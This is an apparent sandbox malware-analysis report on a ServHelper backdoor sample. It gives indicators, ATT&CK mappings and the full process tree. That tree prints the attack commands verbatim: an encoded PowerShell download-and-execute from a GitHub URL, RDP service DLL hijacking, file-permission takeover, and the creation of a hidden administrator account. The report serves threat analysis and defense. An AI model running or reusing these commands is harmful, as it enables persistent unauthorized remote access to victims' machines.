servhelper | aefb4a2472f0517d58cae7e5e0c9c51b4e36b39f6096dbffc6b8cc18d0be7175

Analysis

max time kernel
138s
max time network
129s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
29-03-2024 11:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
Size

5.7MB
MD5

211ca7c8d5fd20f7dcaebdbe354662be
SHA1

1111e864f3e9d2e6879c5179c4136638b05b67c9
SHA256

aefb4a2472f0517d58cae7e5e0c9c51b4e36b39f6096dbffc6b8cc18d0be7175
SHA512

d7e6e638cdfd4792a09d671f4e61de715a63a9001283594e6c73d5a88dfc8b91d201fc19b1228b7b1a654f9abb8cf52893d3cc02aea142a1c5c7b9d3f876e24f
SSDEEP

49152:sr/U2Wrb/T/vO90dL3BmAFd4A64nsfJ1gBO55+1TEf1q7NOVuZnsm/QBrkdL+DLk:srDnOOWmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 3060 powershell.exe
6 3060 powershell.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

3044 icacls.exe
1780 icacls.exe
1324 icacls.exe
2972 takeown.exe
2276 icacls.exe
2080 icacls.exe
804 icacls.exe
2940 icacls.exe

flow	pid	process
5	3060	powershell.exe
6	3060	powershell.exe

pid	process
3044	icacls.exe
1780	icacls.exe
1324	icacls.exe
2972	takeown.exe
2276	icacls.exe
2080	icacls.exe
804	icacls.exe
2940	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

892
892
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid process

2940 icacls.exe
3044 icacls.exe
1780 icacls.exe
1324 icacls.exe
2972 takeown.exe
2276 icacls.exe
2080 icacls.exe
804 icacls.exe

pid	process
892
892

pid	process
2940	icacls.exe
3044	icacls.exe
1780	icacls.exe
1324	icacls.exe
2972	takeown.exe
2276	icacls.exe
2080	icacls.exe
804	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 raw.githubusercontent.com
5 raw.githubusercontent.com
6 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3FXW0VJO33A3CCQ0U2J2.temp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2764 WMIC.exe

pid	process
2764	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exepowershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 408d938bce81da01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2392 reg.exe
Runs net.exe

pid	process
2392	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2948	powershell.exe
908	powershell.exe
1192	powershell.exe
268	powershell.exe
2948	powershell.exe
2948	powershell.exe
2948	powershell.exe
3060	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

464
892
892
892
892

pid	process
464
892
892
892
892

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	268	powershell.exe
Token: SeRestorePrivilege	2080	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2764	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2764	WMIC.exe
Token: SeAuditPrivilege	2764	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2764	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2764	WMIC.exe
Token: SeAuditPrivilege	2764	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2476	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2476	WMIC.exe
Token: SeAuditPrivilege	2476	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2476	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2476	WMIC.exe
Token: SeAuditPrivilege	2476	WMIC.exe
Token: SeDebugPrivilege	3060	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	process	target process
PID 3052 wrote to memory of 2948	3052	211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe	powershell.exe
PID 3052 wrote to memory of 2948	3052	211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe	powershell.exe
PID 3052 wrote to memory of 2948	3052	211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe	powershell.exe
PID 2948 wrote to memory of 2672	2948	powershell.exe	csc.exe
PID 2948 wrote to memory of 2672	2948	powershell.exe	csc.exe
PID 2948 wrote to memory of 2672	2948	powershell.exe	csc.exe
PID 2672 wrote to memory of 2864	2672	csc.exe	cvtres.exe
PID 2672 wrote to memory of 2864	2672	csc.exe	cvtres.exe
PID 2672 wrote to memory of 2864	2672	csc.exe	cvtres.exe
PID 2948 wrote to memory of 908	2948	powershell.exe	powershell.exe
PID 2948 wrote to memory of 908	2948	powershell.exe	powershell.exe
PID 2948 wrote to memory of 908	2948	powershell.exe	powershell.exe
PID 2948 wrote to memory of 1192	2948	powershell.exe	powershell.exe
PID 2948 wrote to memory of 1192	2948	powershell.exe	powershell.exe
PID 2948 wrote to memory of 1192	2948	powershell.exe	powershell.exe
PID 2948 wrote to memory of 268	2948	powershell.exe	powershell.exe
PID 2948 wrote to memory of 268	2948	powershell.exe	powershell.exe
PID 2948 wrote to memory of 268	2948	powershell.exe	powershell.exe
PID 2948 wrote to memory of 2972	2948	powershell.exe	takeown.exe
PID 2948 wrote to memory of 2972	2948	powershell.exe	takeown.exe
PID 2948 wrote to memory of 2972	2948	powershell.exe	takeown.exe
PID 2948 wrote to memory of 2276	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 2276	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 2276	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 2080	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 2080	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 2080	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 804	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 804	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 804	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 2940	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 2940	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 2940	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 3044	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 3044	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 3044	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 1780	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 1780	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 1780	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 1324	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 1324	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 1324	2948	powershell.exe	icacls.exe
PID 2948 wrote to memory of 904	2948	powershell.exe	reg.exe
PID 2948 wrote to memory of 904	2948	powershell.exe	reg.exe
PID 2948 wrote to memory of 904	2948	powershell.exe	reg.exe
PID 2948 wrote to memory of 2392	2948	powershell.exe	reg.exe
PID 2948 wrote to memory of 2392	2948	powershell.exe	reg.exe
PID 2948 wrote to memory of 2392	2948	powershell.exe	reg.exe
PID 2948 wrote to memory of 2140	2948	powershell.exe	reg.exe
PID 2948 wrote to memory of 2140	2948	powershell.exe	reg.exe
PID 2948 wrote to memory of 2140	2948	powershell.exe	reg.exe
PID 2948 wrote to memory of 988	2948	powershell.exe	net.exe
PID 2948 wrote to memory of 988	2948	powershell.exe	net.exe
PID 2948 wrote to memory of 988	2948	powershell.exe	net.exe
PID 988 wrote to memory of 1912	988	net.exe	net1.exe
PID 988 wrote to memory of 1912	988	net.exe	net1.exe
PID 988 wrote to memory of 1912	988	net.exe	net1.exe
PID 2948 wrote to memory of 924	2948	powershell.exe	cmd.exe
PID 2948 wrote to memory of 924	2948	powershell.exe	cmd.exe
PID 2948 wrote to memory of 924	2948	powershell.exe	cmd.exe
PID 924 wrote to memory of 2812	924	cmd.exe	cmd.exe
PID 924 wrote to memory of 2812	924	cmd.exe	cmd.exe
PID 924 wrote to memory of 2812	924	cmd.exe	cmd.exe
PID 2812 wrote to memory of 2928	2812	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2948

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\meg1wxye.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2672

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA249.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA248.tmp"
4⤵
PID:2864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2972

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2276

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:804

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2940

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3044

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1780

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1324

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:904

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:2392

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2140

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:1912

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:924

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\system32\net.exe
net start rdpdr
5⤵
PID:2928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:1880

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
PID:2796

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
PID:1872

C:\Windows\system32\net.exe
net start TermService
5⤵
PID:2056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:1856

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:2024

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:2028

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:2900

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
PID:2388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:2792

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc tRbJrwC9 /add
1⤵
PID:3024

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc tRbJrwC9 /add
2⤵
PID:2256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc tRbJrwC9 /add
3⤵
PID:1128

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:1328

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
PID:1520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:1784

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" PIRBKNPS$ /ADD
1⤵
PID:872

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" PIRBKNPS$ /ADD
2⤵
PID:1956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" PIRBKNPS$ /ADD
3⤵
PID:1468

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:368

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
PID:1584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:1728

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc tRbJrwC9
1⤵
PID:2904

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc tRbJrwC9
2⤵
PID:2332

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc tRbJrwC9
3⤵
PID:3020

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2656

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2764

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2428

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2476

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2864

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:2968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

File and Directory Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA249.tmp
Filesize
1KB

MD5
91e200e200ec4eafe2d0dbcc297f193c

SHA1
05e83c7839c32b5e609570a6f1bfbd010c70a3f6

SHA256
8961123e2d19bc468f4d3da38aa35df7d073c3d7eb287ed82590b01f3d2f4a60

SHA512
d3fb690a01cfe3e6563b835db92b00b78093745839d5d33ab67fa83b3dee00aa9bb781acb7084e30a8d245c7e22ba77ee3cc7e2f1a607d3dd5902bfd12518e45

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
Filesize
2.5MB

MD5
a9176019ae2f0af22af200ca4f842b59

SHA1
22c13657a4210aca116ab63d2f806906dda954fd

SHA256
af452873200eda5950c1dedbfed833da08b697cea98402cd16478df89d770739

SHA512
5171e192c05a60aca06c5b4e12b69744f870a64d8c69289205f7aa082dbe1913cadd7fe4ab8d16f2d2d5eab0ebb687c68d5448b8a821c5912ec9670572d6ad3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\meg1wxye.dll
Filesize
3KB

MD5
19d4d141c8a7ab830079a13d896fd6d6

SHA1
da9152cd5af0f59cc05d4d24859cc8be850fbbd1

SHA256
adb7b5b62050fb1701b549e34b082c83db9f4341135c3210de61f541da309830

SHA512
126e8263787ede37972cac47d4e547a53471eea3bb22cb3ef577df36cb8cae896100964e4f3bd074ecb6454c284cb703c63af0e314bbcc9bc328e623b9f6b457

Download Submit
C:\Users\Admin\AppData\Local\Temp\meg1wxye.pdb
Filesize
7KB

MD5
7051cf22b5426cd594629cb823748f0b

SHA1
4c2894217fb1cd771865ede3fecdce049ac49a90

SHA256
f3fcf5b3a25dbac711f474da992e879076f17ca10edbcff138d0f1d3dc0554e6

SHA512
199fc0e8ee7cec11104aea3a9d3870b96a081fc20a251f9a3b93100cb2f3047be3bb2a70780b576ed6878c3b9282b88243a7220887da14f1ea17a83fc6933f39

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1
Filesize
1KB

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
ed821d5127a58720de1169b7172d168a

SHA1
c18fbcd6fff31f46c0b9ee711cd7d9e29428b089

SHA256
011712b764950825210260227504190e9b56752eee4863f290286a5e149e756a

SHA512
2e1758d2668dcac3be99c8a121684ea2b49e737e892e0f161a18d3c305cf23e51f34c97dace7abd0a922bbf1e2723c8342e7cb15beae9ee0877a1f6732227c96

Download Submit
C:\Windows\system32\rfxvmt.dll
Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA248.tmp
Filesize
652B

MD5
73615fcacfdad7b8f9114b4c6b359b1e

SHA1
c79079e489de262f94bd303f2b2caf79a3039000

SHA256
8077682460ec147b1dd13e5e428ddda3a64e3b1b93c0193662a8170af1b8b707

SHA512
e1a1a72fc31fa5bbb8905850754ff231484deb778c1c51a19966987b46e56602d4b9c93567d47a229bfd92ec56355b19852dbbc83edcde280c3186ec0ebfae16

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\meg1wxye.0.cs
Filesize
424B

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\meg1wxye.cmdline
Filesize
309B

MD5
316ecf0079c434e32aa24fb43e41bc67

SHA1
e0bcdfc8d2bff0d1bae6572753bc7ad1a5ed8814

SHA256
9aa2014a0e88d546bf949512050aeb33d2ee601270e94d43b8cf05a4301a971d

SHA512
15b6e31cc0ab65d6dde5542a7f6e6e367f98e9fa866ff6c9cf22938d097b7808e304033b8be57c4c7edd8cab52ddd204a804b765cb7b9fa6df834dc1a437c5d3

Download Submit
\Windows\Branding\mediasrv.png
Filesize
60KB

MD5
9453615d542c9b0d521b429b9794e07d

SHA1
6c543926f7fcb171970bcca59a4fff36873a50a3

SHA256
b59ab823d4ce1e90b39ac043ded78549b60c62b296c85b7c423d3494af220c34

SHA512
b6816d54bc1790107293f304d3252d84ecb92c6d2fd4b017537329be1fada98322766109c1306d71540cda3ef7936e3f2c0eabd894a9f2fc56183b1add292c34

Download Submit
\Windows\Branding\mediasvc.png
Filesize
743KB

MD5
1b1412c2f9d041ad20da79f2d5a3b130

SHA1
8ac8f1a8c75daf1f150f6bb103c1ccc510067758

SHA256
126438fadef33a97efa43b1339c5cb6e2b45dd81329381968da74909cc1aaa1f

SHA512
3dbcc808c88d8098887f7a69e182d25c17aef23f3f1e7d5fc290792bb99be5a35f62169055fddf42a7082800ddd069ddfb3f2f2742d8687bab30065dc7fb74bc

Download Submit
memory/268-79-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

Filesize
9.6MB

Download
memory/268-72-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

Filesize
9.6MB

Download
memory/268-73-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/268-74-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

Filesize
9.6MB

Download
memory/268-75-0x00000000023F0000-0x0000000002470000-memory.dmp

